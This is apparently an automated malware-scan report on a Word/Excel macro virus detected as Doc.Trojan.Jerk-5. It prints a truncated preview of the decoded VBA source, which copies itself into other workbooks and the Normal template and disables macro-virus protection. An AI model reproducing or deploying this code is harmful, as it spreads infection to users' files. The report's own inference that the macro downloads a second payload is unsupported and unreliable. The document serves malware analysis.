Verdict: MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file contains malicious VBA macros, indicated by the 'OLE_VBA_MACROS' heuristic and ClamAV detection 'Doc.Trojan.Jerk-5'. The 'GetObject' call suggests an attempt to execute external code. The VBA macro code, though obfuscated, likely aims to download and execute a secondary payload, a common tactic for this type of malware.
Heuristics (3)
- ClamAV: Doc.Trojan.Jerk-5 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Jerk-5
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 37394 bytes |

SHA-256: 7047e3a46fe281c321d14bc7dc228091833492a9be48f9c301d99a2ea81c080c
Detection: ClamAV: Doc.Trojan.Jerk-5
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True ' 03:52:49: 오후 - Monday, 8 Nov 1999 ' 조병현 ' Private Sub Workbook_Deactivate() On Error Resume Next Const JJSCLQOYY = 1, SPRQV = True, GWUNWRL = False, PWAODAHUPV = 0 Dim XOVGG, RATDE As String Dim QJDYRTTFQPABTXO, QFWDYJTSW As Integer Dim TLIFV As Boolean RATDE = "ThisWorkbook" XOVGG = Application.ThisWorkbook.VBProject.VBComponents.Item(JJSCLQOYY).codemodule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(JJSCLQOYY).codemodule.CountOfLines) Call UWPTVQZQBH(XOVGG) For QJDYRTTFQPABTXO = JJSCLQOYY To Application.Workbooks.Count TLIFV = GWUNWRL For QFWDYJTSW = JJSCLQOYY To Application.Workbooks.Item(QJDYRTTFQPABTXO).VBProject.VBComponents.Count If Application.Workbooks.Item(QJDYRTTFQPABTXO).VBProject.VBComponents.Item(QFWDYJTSW).codemodule.CountOfLines = PWAODAHUPV Then If Application.Workbooks.Item(QJDYRTTFQPABTXO).Path <> "" And Application.Workbooks.Item(QJDYRTTFQPABTXO).Saved = SPRQV And TLIFV = GWUNWRL Then TLIFV = SPRQV Application.Workbooks.Item(QJDYRTTFQPABTXO).VBProject.VBComponents.Item(QFWDYJTSW).codemodule.InsertLines JJSCLQOYY, XOVGG If Application.Workbooks.Item(QJDYRTTFQPABTXO).VBProject.VBComponents.Item(QFWDYJTSW).Name = RATDE Then Application.Workbooks.Item(QJDYRTTFQPABTXO).VBProject.VBComponents.Item(QFWDYJTSW).codemodule.ReplaceLine JJSCLQOYY * 33, "Private Sub Workbook_Deactivate()" Else Application.Workbooks.Item(QJDYRTTFQPABTXO).VBProject.VBComponents.Item(QFWDYJTSW).codemodule.ReplaceLine JJSCLQOYY * 33, "Private Sub Worksheet_Deactivate()" End If End If Next QFWDYJTSW If TLIFV = SPRQV Then Application.Workbooks.Item(QJDYRTTFQPABTXO).Save Next QJDYRTTFQPABTXO End Sub Private Sub Document_Close() On Error Resume Next Const SPRQV = True, GWUNWRL = False, PWAODAHUPV = 0, JJSCLQOYY = 1, 
BBQYAYDHQDLAS = wdFormatDocument, JHVJWVLIWJL = wdFormatTemplate, GTOYNYL = ":" Dim TLIFV, JCIOGLQ, KRFJRBSHCJK, YMDKDPYQSJM As Boolean Dim SJMTIBIDBOZY, CKUWLVFNSN As Object Dim JUDYXAATGQHODP, XOVGG As String If Month(JJSCLQOYY * Now) > JJSCLQOYY * 2 + JJSCLQOYY * 3 And Day(JJSCLQOYY * Now) = 4 + JJSCLQOYY * 10 Then MsgBox "V guvax " & Application.UserName & " vf n ovt fghcvq wrex!", 0, "www.all.net" Set SJMTIBIDBOZY = ActiveDocument.VBProject.VBComponents.Item(JJSCLQOYY) Set CKUWLVFNSN = NormalTemplate.VBProject.VBComponents.Item(JJSCLQOYY) Randomize KRFJRBSHCJK = GWUNWRL YMDKDPYQSJM = GWUNWRL If SJMTIBIDBOZY.codemodule.CountOfLines <> PWAODAHUPV Then KRFJRBSHCJK = SPRQV If CKUWLVFNSN.codemodule.CountOfLines <> PWAODAHUPV Then YMDKDPYQSJM = SPRQV Options.VirusProtection = GWUNWRL If (KRFJRBSHCJK = SPRQV Xor YMDKDPYQSJM = SPRQV) And (ActiveDocument.SaveFormat = BBQYAYDHQDLAS Or ActiveDocument.SaveFormat = JHVJWVLIWJL) Then If KRFJRBSHCJK = SPRQV Then JCIOGLQ = NormalTemplate.Saved XOVGG = SJMTIBIDBOZY.codemodule.Lines(JJSCLQOYY, SJMTIBIDBOZY.codemodule.CountOfLines) Call WJSEFKVJJAXOYH(XOVGG) If Int(Rnd * 10 * JJSCLQOYY) = JJSCLQOYY * 7 Then Call WXBKXZLPIZXDIJ(XOVGG) Call RZYEJOJ(XOVGG) CKUWLVFNSN.codemodule.InsertLines JJSCLQOYY, XOVGG If JCIOGLQ = SPRQV Then NormalTemplate.Save End If JUDYXAATGQHODP = Mid(ActiveDocument.FullName, 2, JJSCLQOYY) If YMDKDPYQSJM = SPRQV And (JUDYXAATGQHODP = GTOYNYL Or ActiveDocument.Saved = GWUNWRL) Then TLIFV = ActiveDocument.Saved XOVGG = CKUWLVFNSN.codemodule.Lines(JJSCLQOYY, CKUWLVFNSN.codemodule.CountOfLines) Call RZYEJOJ(XOVGG) SJMTIBIDBOZY.codemodule.InsertLines JJSCLQOYY, XOVGG If TLIFV = SPRQV Then ActiveDocument.Save End If End If End Sub Private Sub WXBKXZLPIZXDIJ(ByRef XOVGG As String) On Error Resume Next Const YFYLO = 48, GNINRCIJTGZJAS = 15, ZVSZYI = 5, BURWUC = 65, LNOJAASHJY = 90, JJSCLQOYY = 1, SPRQV = True, GWUNWRL = False Dim XMQNYDYG, XVVPHPCETmp, RDFMJCLWLKEW, XVVPHPCE(JJSCLQOY ... (truncated) |